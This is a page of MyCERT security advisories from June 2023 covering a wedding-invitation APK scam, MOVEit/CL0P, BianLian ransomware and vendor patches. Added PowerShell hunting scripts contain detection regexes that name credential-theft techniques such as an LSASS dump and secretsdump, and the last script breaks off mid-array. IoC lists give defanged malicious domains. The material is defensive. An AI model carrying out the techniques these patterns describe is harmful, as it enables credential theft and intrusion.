MA-950.062023: MyCERT Alert - Wedding Invitation "Jemputan Majlis Perkahwinan" Malicious APK

  • 28 Jun 2023
  • Alert
  • jemputan, kad, invitation, apk, scam, sms, wedding

1.0 Introduction

Recently, MyCERT observed cybercriminals distributing a malicious Android application in a "Wedding Invitation" or "Jemputan Majlis Perkahwinan" malware campaign targeting internet users in Malaysia. The Wedding Invitation Scam preys on people's excitement about wedding invitations. Cybercriminals send text messages via instant messaging apps such as WhatsApp to trick victims into installing a malicious APK on their devices, which can then steal their personal information.

2.0 Impact
Financial loss and disclosure of personal information. An APK is the file format used by the Android operating system to distribute and install mobile apps, usually via the Google Play Store. The malicious APK files allow the perpetrators to steal data from users' mobile phones, including users' TAC numbers, which enables them to make unauthorised banking transactions from victims' bank accounts.

3.0 Affected System and Devices
Android mobile devices.

4.0 Other related alerts and advisories
Below are references to similar incidents:

5.0 Recommendations
The application is designed to retrieve information from the victim's phone and could be used for other malicious purposes. As a CERT, we highly recommend the following:

• Verify the application's permissions and its author or publisher before installing it.
• Avoid sideloading (installing from non-official sources) whenever you can. If you do need to install Android software from a source other than the trusted marketplace, be sure that it comes from a reputable source.
• Do not click on adware or suspicious URLs sent through SMS/messaging services.
• Attachments may carry malicious programs that collect users' information.
• Always run a reputable anti-virus on your smartphone/mobile devices, and keep it up to date.
• Update the operating system and applications on your smartphone/tablet, including the browser, to avoid exploitation of security holes in outdated versions.
• Do not root or 'jailbreak' your phone.
• Contact the relevant authorities and report to the National Scam Response Centre at 997 for any enquiries and assistance related to this threat.

Generally, MyCERT advises the users of these devices to be updated with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.

For further enquiries, don't hesitate to get in touch with MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours)  
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

6.0 References

MA-949.062023: MyCERT Advisory - CISA Releases Four Industrial Control Systems Advisories

  • 28 Jun 2023
  • Advisory
  • ics, security, update, industrial, control, systems

1.0 Introduction

Recently, CISA released four Industrial Control Systems (ICS) advisories on June 22, 2023.

2.0 Impact
These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS. 

3.0 Affected Products

4.0 Recommendations
MyCERT encourages users and administrators to review the newly released ICS advisories for technical details and mitigations.

Kindly refer to the following URLs:

Generally, MyCERT advises the users of these devices to keep up to date with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.


5.0 References

MA-948.062023: MyCERT Advisory - ISC Releases Security Advisories for Multiple Versions of BIND 9

  • 28 Jun 2023
  • Advisory
  • ISC, BIND, security, update

1.0 Introduction

Recently, the Internet Systems Consortium (ISC) released security advisories that address vulnerabilities affecting multiple versions of ISC's Berkeley Internet Name Domain (BIND) 9.

2.0 Impact
A remote attacker could exploit these vulnerabilities to potentially cause denial-of-service conditions.

3.0 Affected Products
Multiple versions of ISC's Berkeley Internet Name Domain (BIND) 9.

4.0 Recommendations
MyCERT encourages users and administrators to review the ISC advisories for CVE-2023-2828, CVE-2023-2829 and CVE-2023-2911 and apply the necessary mitigations.

Kindly refer to the following URLs:

Generally, MyCERT advises the users of these devices to keep up to date with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.


5.0 References

MA-947.062023: MyCERT Advisory - Apple Releases Security Updates for Multiple Products

  • 27 Jun 2023
  • Advisory
  • apple, iOS, iPadOS, macOS, watchOS, update, security

1.0 Introduction

Recently, Apple has released security updates to address vulnerabilities in multiple products.

2.0 Impact
An attacker could exploit some of these vulnerabilities to take control of an affected device:

  • CVE-2023-32434: An integer overflow vulnerability in the Kernel that could be exploited by a malicious app to execute arbitrary code with kernel privileges.
  • CVE-2023-32435: A memory corruption vulnerability in WebKit that could lead to arbitrary code execution when processing specially crafted web content.

3.0 Affected Products

4.0 Recommendations
MyCERT encourages users and administrators to review the following advisories and apply the necessary updates.

Kindly refer to the following URLs:

Generally, MyCERT advises the users of these devices to keep up to date with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.

To update, please refer:


5.0 References

MA-943.062023: MyCERT Advisory - Multiple MOVEit Transfer Vulnerabilities

  • 19 Jun 2023
  • Advisory
  • MOVEit, vulnerability, managed file transfer

1.0 Introduction

Recently, Progress discovered a vulnerability in MOVEit Transfer that could lead to escalated privileges and potential unauthorized access to the environment. If you are a MOVEit Transfer customer, it is extremely important that you take immediate action as noted below to help protect your MOVEit Transfer environment. In Progress MOVEit Transfer versions released before 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7) and 2023.0.3 (15.0.3), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database.

2.0 Impact
A cyber threat actor could exploit this vulnerability to take over an affected system. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint which could result in modification and disclosure of MOVEit database content.

3.0 Affected Products
All MOVEit Transfer versions are affected by this vulnerability.
Based on our review of this situation to date, the following products are not susceptible to this SQL Injection Vulnerability in MOVEit Transfer: MOVEit Automation, MOVEit Client, MOVEit Add-in for Microsoft Outlook, MOVEit Mobile, WS_FTP Client, WS_FTP Server, MOVEit EZ, MOVEit Gateway, MOVEit Analytics, and MOVEit Freely. At this time, no action is necessary for the above-mentioned products.

4.0 Recommendations
NOTICE: All MOVEit Transfer customers must take action and apply the patch for the June 15th CVE-2023-35708 vulnerability discovered in MOVEit Transfer. There are two paths to take, depending on whether you applied the remediation and patching steps from the MOVEit Transfer Critical Vulnerability (May 2023) article prior to June 15.

  • Have NOT applied the May 2023 patch: Follow all the remediation steps and patching in the following article: MOVEit Transfer Critical Vulnerability (May 2023). That article contains the latest patches, which include the fix for the June 9 (CVE-2023-35036) vulnerability as well as the original vulnerability from May 31 (CVE-2023-34362).
    After you have done the above, proceed to the Immediate Mitigation Steps below.
  • Have applied the May 2023 (CVE-2023-34362) patch and followed the remediation steps: Proceed to the Immediate Mitigation Steps and apply the June 15 patch (CVE Pending) as outlined below. You will then be up to date for the vulnerabilities announced on May 31 (CVE-2023-34362), June 9 (CVE-2023-35036) and June 15 (CVE Pending).
  • Have applied the May 2023 (CVE-2023-34362) patch, followed the remediation steps and applied the June 9 (CVE-2023-35036) patch: Proceed to the Immediate Mitigation Steps and apply the June 15 patch (CVE-2023-35708) as outlined below. You will then be up to date for the vulnerabilities announced on May 31 (CVE-2023-34362), June 9 (CVE-2023-35036) and June 15 (CVE-2023-35708).

5.0 Immediate Mitigation Steps
To help prevent unauthorized access to your MOVEit Transfer environment, we strongly recommend that you immediately apply the following mitigation measures until you are able to apply the June 15th patch (CVE-2023-35708).

1. Disable all HTTP and HTTPS traffic to your MOVEit Transfer environment. More specifically:

  • Modify firewall rules to deny HTTP and HTTPS traffic to MOVEit Transfer on ports 80 and 443.
  • It is important to note that until HTTP and HTTPS traffic is enabled again:
    • Users will not be able to log on to the MOVEit Transfer web UI
    • MOVEit Automation tasks that use the native MOVEit Transfer host will not work
    • REST, Java and .NET APIs will not work
    • The MOVEit Transfer add-in for Outlook will not work
  • SFTP and FTP/S protocols will continue to work as normal

2. As a workaround, administrators will still be able to access MOVEit Transfer by using a remote desktop to access the Windows machine and then accessing https://localhost/. For more information on localhost connections, please refer to MOVEit Transfer Help: https://docs.progress.com/bundle/moveit-transfer-web-admin-help-2023/page/Security-Policies-Remote-Access_2.html 

3. Apply the Patch 
As patches for supported MOVEit Transfer versions become available, links will be provided below. Supported versions are listed at the following link: https://community.progress.com/s/products/moveit/product-lifecycle. Please note, the license file can remain the same when staying on a major release to apply the patch. 

4. Enable all HTTP and HTTPS traffic to your MOVEit Transfer environment

5. Please bookmark the Progress Security Page and refer to it to ensure you have all of the latest updates. 
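Steps 1 and 4 of the mitigation above on the Windows host that runs MOVEit Transfer, as an added example that is not from Progress or MyCERT. It assumes the web UI is served by IIS on the default ports 80 and 443, that it runs in an elevated PowerShell session on the MOVEit Transfer host, and the rule names are our own choice.

```powershell
# Added example (not Progress's or MyCERT's own script): Windows Firewall rules for step 1
# (deny HTTP/HTTPS to MOVEit Transfer) and step 4 (re-enable) of the mitigation above.
# Assumptions: IIS serves the MOVEit Transfer web UI on TCP 80/443 and this runs elevated on
# the MOVEit host. Only 80/443 are blocked, so SFTP and FTP/S keep working as the advisory
# says; the https://localhost/ workaround in step 2 is unaffected because Windows Firewall
# does not apply inbound rules to loopback traffic.

$RuleNames = @('MOVEit-Mitigation-Block-HTTP-80', 'MOVEit-Mitigation-Block-HTTPS-443')  # our names

function Disable-MoveitWebTraffic {
    # Step 1: block rules take precedence over IIS's existing allow rules, so those stay as they are.
    New-NetFirewallRule -DisplayName $RuleNames[0] -Direction Inbound -Protocol TCP `
        -LocalPort 80  -Action Block -Profile Any | Out-Null
    New-NetFirewallRule -DisplayName $RuleNames[1] -Direction Inbound -Protocol TCP `
        -LocalPort 443 -Action Block -Profile Any | Out-Null
}

function Test-MoveitWebBlocked {
    # Returns $true only when both block rules exist and are enabled. Run it before trusting
    # that the web UI is unreachable, and again after step 4 expecting $false.
    $rules = @(Get-NetFirewallRule -DisplayName $RuleNames -ErrorAction SilentlyContinue |
               Where-Object { $_.Enabled -eq 'True' -and $_.Action -eq 'Block' })
    return ($rules.Count -eq $RuleNames.Count)
}

function Enable-MoveitWebTraffic {
    # Step 4: remove only the temporary rules once the June 15 patch has been applied.
    Get-NetFirewallRule -DisplayName $RuleNames -ErrorAction SilentlyContinue | Remove-NetFirewallRule
}

Disable-MoveitWebTraffic
if (-not (Test-MoveitWebBlocked)) {
    throw 'MOVEit block rules were not created; do not proceed to patching with the web UI exposed.'
}
# Apply the patch (step 3), then run Enable-MoveitWebTraffic for step 4 and confirm
# Test-MoveitWebBlocked returns $false.
```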


DLL Drop-In (for customers who have one of the required versions listed installed)

IMPORTANT: Please read the README.txt before attempting the DLL Drop-in Install. Do not leave old versions of these DLL files on the system. They must be completely removed, not just renamed. 

Required Version for DLL Drop-In | Fixed Version (DLL drop-in) | Documentation
MOVEit Transfer 2023.0.1, 2023.0.2 (15.0.1, 15.0.2) | MOVEit Transfer 2023.0.3 (15.0.3) | Download the patch at the link in the Fixed Version column and see the readme.txt file in the zip file for instructions
MOVEit Transfer 2022.1.5, 2022.1.6 (14.1.5, 14.1.6) | MOVEit Transfer 2022.1.7 (14.1.7) | Download the patch at the link in the Fixed Version column and see the readme.txt file in the zip file for instructions
MOVEit Transfer 2022.0.4, 2022.0.5 (14.0.4, 14.0.5) | MOVEit Transfer 2022.0.6 (14.0.6) | (as above)
MOVEit Transfer 2021.1.4, 2021.1.5 (13.1.4, 13.1.5) | MOVEit Transfer 2021.1.6 (13.1.6) | Download the patch at the link in the Fixed Version column and see the readme.txt file in the zip file for instructions
MOVEit Transfer 2021.0.6, 2021.0.7 (13.0.6, 13.0.7) | MOVEit Transfer 2021.0.8 (13.0.8) | (as above)
MOVEit Transfer 2020.1.6 (12.1.6) or later | MOVEit Transfer 2020.1.10 (12.1.10) | Download the patch at the link in the Fixed Version column and see the readme.txt file in the zip file for instructions
MOVEit Transfer 2020.0.x (12.0) or older | MUST upgrade to a supported version | See MOVEit Transfer Upgrade and Migration Guide

Full Installer

Affected Version | Fixed Version (full installer) | Documentation
MOVEit Transfer 2023.0.x (15.0.x) | MOVEit Transfer 2023.0.3 (15.0.3) | MOVEit 2023 Upgrade Documentation
MOVEit Transfer 2022.1.x (14.1.x) | MOVEit Transfer 2022.1.7 (14.1.7) | MOVEit 2022 Upgrade Documentation
MOVEit Transfer 2022.0.x (14.0.x) | MOVEit Transfer 2022.0.6 (14.0.6) | (as above)
MOVEit Transfer 2021.1.x (13.1.x) | MOVEit Transfer 2021.1.6 (13.1.6) | MOVEit 2021 Upgrade Documentation
MOVEit Transfer 2021.0.x (13.0.x) | MOVEit Transfer 2021.0.8 (13.0.8) | (as above)
MOVEit Transfer 2020.1.x (12.1) | Must update to at least 2020.1.6, then apply the DLL Drop-ins above | See KB: Vulnerability (May 2023) Fix for MOVEit Transfer 2020.1 (12.1)
MOVEit Transfer 2020.0.x (12.0) or older | MUST upgrade to a supported version | See MOVEit Transfer Upgrade and Migration Guide
MOVEit Cloud | Prod: 14.1.6.97 or 14.0.5.45; Test: 15.0.2.39 | All MOVEit Cloud systems are fully patched at this time. See the Cloud Status Page

MyCERT urges users and organizations to review the MOVEit Transfer Advisory, follow the mitigation steps, apply the necessary updates, and hunt for any malicious activity.

Kindly refer to the following URL: https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023

Generally, MyCERT advises the users of these devices to keep up to date with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.


6.0 References

MA-946.062023: MyCERT Advisory - Microsoft's Monthly (June 2023) consolidated tech and security patches update

  • 19 Jun 2023
  • Advisory
  • microsoft, update, security

1.0 Introduction

Recently, Microsoft has released updates to address multiple vulnerabilities in Microsoft software.

2.0 Impact
An attacker can exploit some of these vulnerabilities to take control of an affected system.

3.0 Affected Products
Multiple Microsoft software products.

4.0 Recommendations
MyCERT encourages users and administrators to review Microsoft’s June 2023 Security Update Guide and Deployment Information and apply the necessary updates.

Kindly refer to the following URLs:

Generally, MyCERT advises the users of these devices to keep up to date with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.


5.0 References

MA-945.062023: MyCERT Advisory - Mozilla Releases Security Updates for Multiple Products

  • 19 Jun 2023
  • Advisory
  • mozilla, firefox, update

1.0 Introduction

Recently, Mozilla has released security updates to address vulnerabilities for Firefox 114 and Firefox ESR 102.12.

2.0 Impact
An attacker could exploit these vulnerabilities to take control of an affected system.

3.0 Affected Products
Firefox 114 and Firefox ESR 102.12.

4.0 Recommendations
MyCERT encourages users and administrators to review Mozilla’s security advisories for Firefox 114 and Firefox ESR 102.12 for more information and apply the necessary updates.

Kindly refer to the following URLs for more information:

Generally, MyCERT advises the users of these devices to keep up to date with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.


5.0 References

MA-944.062023: MyCERT Advisory - CL0P Ransomware Gang Exploits CVE-2023-34362 MOVEit Vulnerability

  • 15 Jun 2023
  • Advisory
  • cl0p, ransomware, moveit, vulnerability

1.0 Introduction

Open-source data indicates that on May 27, 2023, the CL0P Ransomware Gang, also known as TA505, started exploiting a previously unreported SQL injection vulnerability (CVE-2023-34362) in Progress Software's managed file transfer (MFT) solution, MOVEit Transfer.

A web shell called LEMURLOOT was used to infect publicly accessible MOVEit Transfer web applications and steal data from the underlying MOVEit Transfer databases. A similar flurry of activity was launched by TA505 in early 2023 against Fortra/Linoma GoAnywhere MFT servers and Accellion File Transfer Appliance (FTA) devices, in the form of zero-day exploit-driven attacks.


2.0 Impact
Through the LEMURLOOT web shell, the actors are able to:

  • Retrieve Microsoft Azure system settings and enumerate the underlying SQL database.
  • Store a string sent by the operator and then retrieve a file with a name matching the string from the MOVEit Transfer system.
  • Create a new administrator-privileged account with a randomly generated username and the LoginName and RealName values set to "Health Check Service".
  • Delete an account with the LoginName and RealName values set to "Health Check Service".
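A host-side hunt for the LEMURLOOT web shell described above, as an added example that is not MyCERT's, CISA's or Progress's own tooling. It assumes IIS serves MOVEit Transfer from a web root you supply, that IIS W3C logs are in their default location, and it uses the shell file name human2.aspx and the May 27, 2023 start date given on this page.

```powershell
# Added example, not from MyCERT or Progress: two-part hunt on a MOVEit Transfer host for the
# LEMURLOOT web shell (dropped as e.g. human2.aspx, per the IoC section of this advisory).
# Assumptions (placeholders): $WebRoot is the IIS web root that serves MOVEit Transfer and must
# be set to the real path; $LogRoot is the IIS default log location; $Since is the earliest
# exploitation date given in the advisory (27 May 2023).

param(
    [string]$WebRoot = '<path-to-MOVEit-Transfer-web-root>',
    [string]$LogRoot = 'C:\inetpub\logs\LogFiles',
    [datetime]$Since = [datetime]'2023-05-27'
)

# Part 1: .aspx files created or modified since the campaign started. MOVEit's own pages are
# written at install/patch time, so newer ones deserve review even when not named human2.aspx,
# because an operator can rename the shell.
function Find-RecentAspxFiles {
    param([string]$Root, [datetime]$Cutoff)
    Get-ChildItem -Path $Root -Recurse -Filter '*.aspx' -File -ErrorAction SilentlyContinue |
        Where-Object { $_.LastWriteTime -ge $Cutoff -or $_.CreationTime -ge $Cutoff } |
        Select-Object FullName, CreationTime, LastWriteTime, Length
}

# Part 2: IIS log lines that reference the known shell name. W3C log fields are space-separated
# and begin with date and time, which is enough to scope the intrusion window; the full line is
# kept so the analyst can read the client IP and status code from it.
function Find-WebShellRequests {
    param([string]$Root, [string]$ShellName = 'human2.aspx')
    Get-ChildItem -Path $Root -Recurse -Filter '*.log' -File -ErrorAction SilentlyContinue |
        Select-String -Pattern ('/' + [regex]::Escape($ShellName)) |
        ForEach-Object {
            $f = $_.Line -split ' '
            [pscustomobject]@{ LogFile = $_.Filename; Date = $f[0]; Time = $f[1]; Line = $_.Line }
        }
}

$files = Find-RecentAspxFiles -Root $WebRoot -Cutoff $Since
$hits  = Find-WebShellRequests -Root $LogRoot
"Recently written .aspx files under $WebRoot :"; $files | Format-Table -AutoSize
"IIS requests to human2.aspx under $LogRoot :";   $hits  | Format-Table -AutoSize

# A hit in either list is grounds to treat the host as compromised: isolate it, preserve the
# files and logs, and follow the MOVEit Transfer advisory's remediation steps before restoring service.
```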


3.0 Affected Products

  • MOVEit Transfer 2023.0.0
  • MOVEit Transfer 2022.1.x
  • MOVEit Transfer 2022.0.x
  • MOVEit Transfer 2021.1.x
  • MOVEit Transfer 2021.0.x
  • MOVEit Transfer 2020.1.x
  • MOVEit Transfer 2020.0.x


4.0 Indicators of Compromise (IoCs)
4.1 MOVEit Campaign Indicators of Compromise

Files: LEMURLOOT web shell, e.g. human2.aspx (the original advisory lists SHA-256 hashes of the known samples)

4.2 GoAnywhere Campaign Indicators of Compromise

Files | Description (the original advisory also gives a SHA-256 hash per file)
larabqFa.exe, Qboxdv.dll | Truebot
%TMP%\7ZipSfx.000\Zoom.exe | Spawns a PowerShell subprocess which executes a malicious DLL file
%TMP%\7ZipSfx.000\ANetDiag.dll | Obfuscated malware which also uses long sleeps and debug detection to evade analysis
AVICaptures.dll | Truebot
kpdphhajHbFerUr.exe, gamft.dll | Truebot
dnSjujahur.exe, Pxaz.dll | Truebot
7ZSfxMod_x86.exe, ZoomInstaller.exe, Zoom.exe | Fake Zoom installer - Truebot
update.jsp | Java Server Pages (JSP) web shell with some base64 obfuscation
%TMP%\<folder>\extracted_at_0xe5c8f00.exe | Employs sandbox detection and string obfuscation - appears to be a collection of C# hack tools
UhfdkUSwkFKedUUi.exe, gamft.dll | Truebot

Email Address | Description
unlock@rsv-box[.]com | CL0P communication email
unlock@support-mult[.]com | CL0P communication email
rey14000707@gmail[.]com | Login/Download
gagnondani225@gmail[.]com | Email

Malicious Domain
http://hiperfdhaus[.]com
http://jirostrogud[.]com
http://qweastradoc[.]com
http://qweastradoc[.]com/gate.php
http://connectzoomdownload[.]com/download/ZoomInstaller.exe
https://connectzoomdownload[.]com/download/ZoomInstaller.exe


Certificate Name | Status | Date Valid | Thumbprint | Serial Number
Savas Investments PTY LTD | Valid (Issuer: Sectigo Public Code Signing CA R36) | 10/7/2022 - 10/7/2023 | 8DCCF6AD21A58226521E36D7E5DBAD133331C181 | 00-82-D2-24-32-3E-FA-65-06-0B-64-1F-51-FA-DF-EF-02

MOVEit Campaign Infrastructure IP Addresses (May/June 2023) and GoAnywhere Campaign Infrastructure IP Addresses (January/February 2023): the original advisory lists the infrastructure IP addresses for both campaigns.

5.0 Recommendations
MyCERT recommends that users and administrators follow the security best practices below to improve their organization's security posture.

  • Reduce the threat of malicious actors using remote access tools by:
    • Auditing remote access tools.
    • Reviewing logs for execution of remote access software.
    • Using security software.
    • Requiring authorized remote access solutions.
    • Blocking both inbound and outbound connections.
  • Implement application controls.
  • Strictly limit the use of RDP and other remote desktop services.
  • Disable command-line and scripting activities.
  • Restrict the use of PowerShell.
  • Update Windows PowerShell or PowerShell Core.
  • Review domain controllers, servers, workstations, and Active Directory.
  • Audit user accounts with administrative privileges.
  • Reduce the threat of credential compromise.
  • Implement time-based access for accounts.

In addition, MyCERT recommends applying the following measures to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:

  • Implement a recovery plan.
  • Maintain offline backups of data.
  • Require multifactor authentication.
  • Keep all operating systems, software and firmware up to date.
  • Segment networks.
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a network monitoring tool.
  • Install, regularly update, and enable real-time detection for antivirus software.
  • Disable unused ports and hyperlinks.
  • Consider adding an email banner to emails.
  • Ensure all backup data is encrypted and immutable.

Generally, MyCERT advises the users of these devices to keep up to date with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.



6.0 References

MA-942.062023: MyCERT Advisory - Fortinet Fixes Critical RCE Flaw in Fortigate SSL-VPN Devices

  • 15 Jun 2023
  • Advisory
  • fortinet, fortiOS, fortigate

1.0 Introduction

Recently, Fortinet has released security updates to address a heap-based buffer overflow vulnerability CVE-2023-27997 in FortiOS and FortiProxy.

2.0 Impact
An attacker could exploit this vulnerability to take control of an affected system.

3.0 Affected Products

  • FortiOS-6K7K version 7.0.10
  • FortiOS-6K7K version 7.0.5
  • FortiOS-6K7K version 6.4.12
  • FortiOS-6K7K version 6.4.10
  • FortiOS-6K7K version 6.4.8
  • FortiOS-6K7K version 6.4.6
  • FortiOS-6K7K version 6.4.2
  • FortiOS-6K7K version 6.2.9 through 6.2.13
  • FortiOS-6K7K version 6.2.6 through 6.2.7
  • FortiOS-6K7K version 6.2.4
  • FortiOS-6K7K version 6.0.12 through 6.0.16
  • FortiOS-6K7K version 6.0.10
  • FortiProxy version 7.2.0 through 7.2.3
  • FortiProxy version 7.0.0 through 7.0.9
  • FortiProxy version 2.0.0 through 2.0.12
  • FortiProxy 1.2 all versions
  • FortiProxy 1.1 all versions
  • FortiOS version 7.2.0 through 7.2.4
  • FortiOS version 7.0.0 through 7.0.11
  • FortiOS version 6.4.0 through 6.4.12
  • FortiOS version 6.2.0 through 6.2.13
  • FortiOS version 6.0.0 through 6.0.16

4.0 Recommendations
MyCERT encourages users and administrators to review Fortinet security advisory FG-IR-23-097 and apply the necessary updates. For more information, see Fortinet's Analysis of CVE-2023-27997 and Clarifications on Volt Typhoon Campaign.

Kindly refer to the URLs below:

Generally, MyCERT advises the users of these devices to keep up to date with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.


5.0 References

MA-941.062023: MyCERT Advisory - BianLian Ransomware Group

  • 15 Jun 2023
  • Advisory
  • bianlian, ransomware

1.0 Introduction

Recently, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Cyber Security Centre (ACSC) released a joint Cybersecurity Advisory to disseminate known BianLian ransomware and data extortion group IOCs and TTPs identified through FBI and ACSC investigations as of March 2023. 

BianLian is a ransomware developer, deployer, and data extortion cybercriminal group that has targeted organizations in multiple U.S. critical infrastructure sectors since June 2022. They have also targeted Australian critical infrastructure sectors in addition to professional services and property development. The group gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian group actors then extort money by threatening to release data if payment is not made. BianLian group originally employed a double-extortion model in which they encrypted victims’ systems after exfiltrating the data; however, around January 2023, they shifted to primarily exfiltration-based extortion.

2.0 Technical Details
BianLian is a ransomware developer, deployer, and data extortion cybercriminal group. FBI observed BianLian group targeting organizations in multiple U.S. critical infrastructure sectors since June 2022. In Australia, ACSC has observed BianLian group predominantly targeting private enterprises, including one critical infrastructure organization. BianLian group originally employed a double-extortion model in which they exfiltrated financial, client, business, technical, and personal files for leverage and encrypted victims’ systems. In 2023, FBI observed BianLian shift to primarily exfiltration-based extortion with victims’ systems left intact, and ACSC observed BianLian shift exclusively to exfiltration-based extortion. BianLian actors warn of financial, business, and legal ramifications if payment is not made.

2.1 Initial access
BianLian group actors gain initial access to networks by leveraging compromised Remote Desktop Protocol (RDP) credentials likely acquired from initial access brokers or via phishing.

2.2 Command and Control
BianLian group actors implant a custom backdoor specific to each victim written in Go (see the Indicators of Compromise Section for an example) and install remote management and access software—e.g., TeamViewer, Atera Agent, SplashTop, AnyDesk—for persistence and command and control.
FBI also observed BianLian group actors create and/or activate local administrator accounts and change those account passwords.

2.3 Defense Evasion
BianLian group actors use PowerShell and Windows Command Shell to disable antivirus tools, specifically Windows Defender and the Antimalware Scan Interface (AMSI). BianLian actors modify the Windows Registry to disable tamper protection for the Sophos SAVEnabled, SEDEnabled, and SAVService settings, which enables them to uninstall these services. See Table 2: PowerShell and Windows Command Shell Activity for additional information, including specific commands they have used.

2.4 Discovery
BianLian group actors use a combination of compiled tools, which they first download to the victim environment, to learn about the victim’s environment. BianLian group actors have used: 
• Advanced Port Scanner, a network scanner used to find open ports on network computers and retrieve versions of programs running on the detected ports.
• SoftPerfect Network Scanner (netscan.exe), a network scanner that can ping computers, scan ports, and discover shared folders. 
• SharpShares to enumerate accessible network shares in a domain. 
• PingCastle to enumerate Active Directory (AD). PingCastle provides an AD map to visualize the hierarchy of trust relationships. 
BianLian actors also use native Windows tools and Windows Command Shell to: 
• Query currently logged-in users. 
• Query the domain controller to identify:

  • All groups.
  • Accounts in the Domain Admins and Domain Computers groups.
  • All users in the domain. 

• Retrieve a list of all domain controllers and domain trusts. 
• Identify accessible devices on the network. 

2.5 Credential Access
BianLian group uses valid accounts for lateral movement through the network and to pursue other follow-on activity. To obtain the credentials, BianLian group actors use Windows Command Shell to find unsecured credentials on the local machine. FBI also observed BianLian harvest credentials from the Local Security Authority Subsystem Service (LSASS) memory, download RDP Recognizer (a tool that could be used to brute force RDP passwords or check for RDP vulnerabilities) to the victim system, and attempt to access an Active Directory domain database (NTDS.dit).
In one case, FBI observed BianLian actors use a portable executable version of an Impacket tool (secretsdump.py) to move laterally to a domain controller and harvest credential hashes from it. 
Note: Impacket is a Python toolkit for programmatically constructing and manipulating network protocols. Through the Command Shell, an Impacket user with credentials can run commands on a remote device using the Windows management protocols required to support an enterprise network.

2.6 Persistence and Lateral Movement
BianLian group actors use PsExec and RDP with valid accounts for lateral movement. Prior to using RDP, BianLian actors used Command Shell and native Windows tools to add user accounts to the local Remote Desktop Users group, modify the added account’s password, and modify Windows firewall rules to allow incoming RDP traffic. See Table 2: PowerShell and Windows Command Shell Activity for additional information. 
In one case, FBI found a forensic artifact (exp.exe) on a compromised system that likely exploits the Netlogon vulnerability (CVE-2020-1472) and connects to a domain controller.
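The discovery, credential-access and lateral-movement commands described in sections 2.4 to 2.6 (and listed in Table 2) are all ordinary process launches, so the cheapest place to catch them after the fact is process-creation telemetry. The following script is an added example written for this advisory; it is not part of the MyCERT/CISA text and does not come from the BianLian tooling. It assumes Sysmon is installed with process-creation logging (Event ID 1); for Security event 4688, enable command-line auditing and change $LogName and $EventId. The command lines at the end are constructed samples, copied from Table 2 plus one benign line, used only for a self-check.

```powershell
# Added example, not part of the MyCERT/CISA advisory: sweeps a host's Sysmon process-creation
# events (Event ID 1) for the discovery, credential-access, lateral-movement and defense-evasion
# command lines described in sections 2.3-2.6 and listed in Table 2.
# Assumption: Sysmon is installed; for Security 4688 change $LogName/$EventId and enable
# command-line auditing. The $constructed lines below are samples for a self-check, not log data.

$LogName = 'Microsoft-Windows-Sysmon/Operational'
$EventId = 1

# Regexes over the full CommandLine, each tagged with the advisory section it comes from.
$patterns = @(
    @{ Tag = '2.4 discovery: net group/user ... /domain';   Regex = '(?i)\bnet(\.exe)?\s+(group|user)\b.*\s/domain\b' },
    @{ Tag = '2.4 discovery: nltest DC/trust enumeration';  Regex = '(?i)\bnltest(\.exe)?\s+/(dclist|domain_trusts)' },
    @{ Tag = '2.4 discovery: logged-on users (quser)';      Regex = '(?i)(^|\s)quser(\.exe)?(\s|;|$)' },
    @{ Tag = '2.4 discovery: SharpShares';                  Regex = '(?i)/ldap:all\s+/verbose' },
    @{ Tag = '2.5 credentials: LSASS dump via comsvcs';     Regex = '(?i)comsvcs\.dll,\s*MiniDump' },
    @{ Tag = '2.5 credentials: findstr password sweep';     Regex = '(?i)\bfindstr\b.*\s/spin\s' },
    @{ Tag = '2.5 credentials: secretsdump -just-dc';       Regex = '(?i)\s-just-dc\b' },
    @{ Tag = '2.6 lateral: RDP group or firewall change';   Regex = '(?i)(localgroup\s+"Remote Desktop Users".*/add|advfirewall\s+firewall\s+(add|set)\s+rule)' },
    @{ Tag = '2.3 evasion: AMSI/Defender/Sophos tampering'; Regex = '(?i)(amsiInitFailed|FeatureName:Windows-Defender|TamperProtection)' }
)

function Test-BianLianCommandLine {
    # Returns the tag of every pattern the command line matches (empty array if none).
    param([string]$CommandLine)
    @($patterns | Where-Object { $CommandLine -match $_.Regex } | ForEach-Object { $_.Tag })
}

function Find-BianLianCommandLines {
    param([int]$Hours = 72)
    $filter = @{ LogName = $LogName; Id = $EventId; StartTime = (Get-Date).AddHours(-$Hours) }
    foreach ($e in (Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)) {
        # Pull EventData fields by name so the XML field order does not matter.
        $data = @{}
        foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        foreach ($tag in (Test-BianLianCommandLine $data['CommandLine'])) {
            [pscustomobject]@{
                Time    = $e.TimeCreated
                Tag     = $tag
                User    = $data['User']
                Parent  = $data['ParentImage']
                Command = $data['CommandLine']
            }
        }
    }
}

# Self-check on constructed command lines taken from Table 2 plus one benign line (no event log needed).
$constructed = @(
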